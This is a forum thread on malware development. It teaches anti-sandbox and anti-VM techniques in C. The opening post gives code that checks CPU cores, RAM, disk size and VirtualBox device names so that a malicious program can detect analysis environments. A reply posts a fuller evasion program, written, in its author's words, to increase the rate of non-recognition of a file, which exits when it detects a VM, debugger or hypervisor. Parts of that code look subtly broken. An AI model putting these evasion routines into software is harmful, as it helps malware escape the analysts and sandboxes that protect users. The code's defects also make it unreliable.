Malware development | anti-sandbox | anti-VM techniques in c

malware development | anti-sandbox | anti-VM techniques in c

video out now but thanks for subscribing

Analyzing a malwareapp dynamically

Dynamic analysis of an executable may be performed either automatically by a sandbox or manually by a malware analyst. Malicious applications often use various methods to finger print the environment they’re being executed in and perform different actions based on a given execution environment situation.

Automated analysis is performed in a simplified sandbox environment which may have some specific traits; particularly it may not be able to emulate all execution nuances of a real environment.

Both automated and manual analysis have common characteristics, in particular they are usually performed in virtual environments which can be easily detected if not configured properly.

Most sandbox detection techniques revolve around checking specific environment attributes

Example
limited resources, indicative device names artifacts ,presence of specific files, registry keys

Detecting virtual environments

Both sandboxes and analyst’s virtual Operating Systems usually can’t 100% emulate actual execution environment like typical user workstations). Virtual environments have limited resources ,corresponding device names whch can also provide useful information, may have VM-specific tools and drivers installed, often look like fresh Windows installations and sometimes use hardcoded user or computer names.

Hardware resources information retrieval
sandboxes /VM boxes used by analysts are subjected to some constraints - they often have limited resources.

Typical user workstation have processors with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive space. We can verify if the environment our malicious application is being executed in is a subject to these constrains:

// check CPU
SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo);
DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors;
if (numberOfProcessors < 2) return false;

// check RAM
MEMORYSTATUSEX memoryStatus;
memoryStatus.dwLength = sizeof(memoryStatus);
GlobalMemoryStatusEx(&memoryStatus);
DWORD RAMMB = memoryStatus.ullTotalPhys / 1024 / 1024;
if (RAMMB < 2048) return false;

// check HDD

HANDLE hDevice = CreateFileW(L"\\.\PhysicalDrive0", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

DISK_GEOMETRY pDiskGeometry;

DWORD bytesReturned;

DeviceIoControl(hDevice, IOCTL_DISK_GET_DRIVE_GEOMETRY, NULL, 0,&pDiskGeometry, sizeof(pDiskGeometry), &bytesReturned, (LPOVERLAPPED)NULL);

DWORD diskSizeGB;

diskSizeGB = pDiskGeometry.Cylinders.QuadPart * (ULONG)pDiskGeometry.TracksPerCylinder * (ULONG)pDiskGeometry.SectorsPerTrack * (ULONG)pDiskGeometry.BytesPerSector / 1024 / 1024 / 1024;

if (diskSizeGB < 100) return false;

Devices and vendor names

On default VM installations, devices often have predictable names, for example containing strings associated with the specific hypervisor. We can check for hard drive name, optical disk drive name, BIOS version, computer manufacturer and model name, graphics controller name etc. Relevant information can be retrieved with WMI queries (check properties like “Name”, “Description”, “Caption”).

Below you can see an example of HDD name retrieval using native Windows API functions (without WMI):

HDEVINFO hDeviceInfo = SetupDiGetClassDevs(&GUID_DEVCLASS_DISKDRIVE, 0, 0, DIGCF_PRESENT);

SP_DEVINFO_DATA deviceInfoData;

deviceInfoData.cbSize = sizeof(SP_DEVINFO_DATA);

SetupDiEnumDeviceInfo(hDeviceInfo, 0, &deviceInfoData);

DWORD propertyBufferSize;

SetupDiGetDeviceRegistryPropertyW(hDeviceInfo, &deviceInfoData, SPDRP_FRIENDLYNAME, NULL, NULL, 0, &propertyBufferSize);

PWSTR HDDName = (PWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, propertyBufferSize);SetupDiGetDeviceRegistryPropertyW(hDeviceInfo, &deviceInfoData, SPDRP_FRIENDLYNAME, NULL, (PBYTE)HDDName, propertyBufferSize, NULL);

CharUpperW(HDDName);

if (wcsstr(HDDName, L"VBOX")) return false;

3 Likes

This is a sample code that I wrote to increase the rate of non-recognition of my file

# © Code By E1.Coders
#include <windows.h>
#include <winreg.h>
#include <stdio.h>

bool is_sandboxed() {
    HDEVINFO hDeviceInfo = SetupDiGetClassDevs(&GUID_DEVCLASS_DISKDRIVE, NULL, NULL, DIGCF_PRESENT | DIGCF_DEVICEINTERFACE);
    if (hDeviceInfo == INVALID_HANDLE_VALUE) {
        return false;
    }

    SP_DEVICE_INTERFACE_DATA deviceInterfaceData;
    deviceInterfaceData.cbSize = sizeof(SP_DEVICE_INTERFACE_DATA);

    for (int i = 0; SetupDiEnumDeviceInterfaces(hDeviceInfo, NULL, &GUID_DEVCLASS_DISKDRIVE, i, &deviceInterfaceData); i++) {
        DWORD dwRegKeySize = 0;
        SetupDiGetDeviceRegistryProperty(hDeviceInfo, &deviceInterfaceData, SPDRP_REGISTRYKEY, NULL, NULL, 0, &dwRegKeySize);

        if (dwRegKeySize > 0) {
            wchar_t* pDeviceRegistryKey = (wchar_t*)malloc(dwRegKeySize);
            SetupDiGetDeviceRegistryProperty(hDeviceInfo, &deviceInterfaceData, SPDRP_REGISTRYKEY, NULL, (PBYTE)pDeviceRegistryKey, dwRegKeySize, NULL);

            HKEY hKey;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, pDeviceRegistryKey, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
                wchar_t path[MAX_PATH];
                if (RegQueryValueExW(hKey, L"Parent", NULL, NULL, (LPBYTE)path, NULL) == ERROR_SUCCESS) {
                    if (_wcsstr(path, L"VMWare") || _wcsstr(path, L"VirtualBox")) {
                        free(pDeviceRegistryKey);
                        RegCloseKey(hKey);
                        SetupDiDestroyDeviceInfoList(hDeviceInfo);
                        return true;
                    }
                }

                RegCloseKey(hKey);
            }

            free(pDeviceRegistryKey);
        }
    }

    SetupDiDestroyDeviceInfoList(hDeviceInfo);
    return false;
}

bool is_debugger_present() {
    return IsDebuggerPresent();
}

bool is_virtualized() {
    bool is_virtualized = false;

    // Check for virtualized CPUID function
    __try {
        __asm {
            mov eax, 0x80000001
            cpuid
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        is_virtualized = true;
    }

    // Check for hypervisor-specific indicators
    HKEY hKey;
    if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        wchar_t vendor[0x40];
        DWORD size = sizeof(vendor);
        RegQueryValueExW(hKey, L"VendorIdentifier", NULL, NULL, (LPBYTE)vendor, &size);

        if (_wcsstr(vendor, L"VMware") || _wcsstr(vendor, L"VirtualBox") || _wcsstr(vendor, L"QEMU")) {
            is_virtualized = true;
        }

        RegCloseKey(hKey);
    }

    return is_virtualized;
}

int main() {
    if (is_sandboxed() || is_debugger_present() || is_virtualized()) {
        // Prevent analysis by exiting
        exit(0);
    }

    // Rest of the code
    return 0;
}


3 Likes

wow this is cool men thansks alot

This topic was automatically closed after 121 days. New replies are no longer allowed.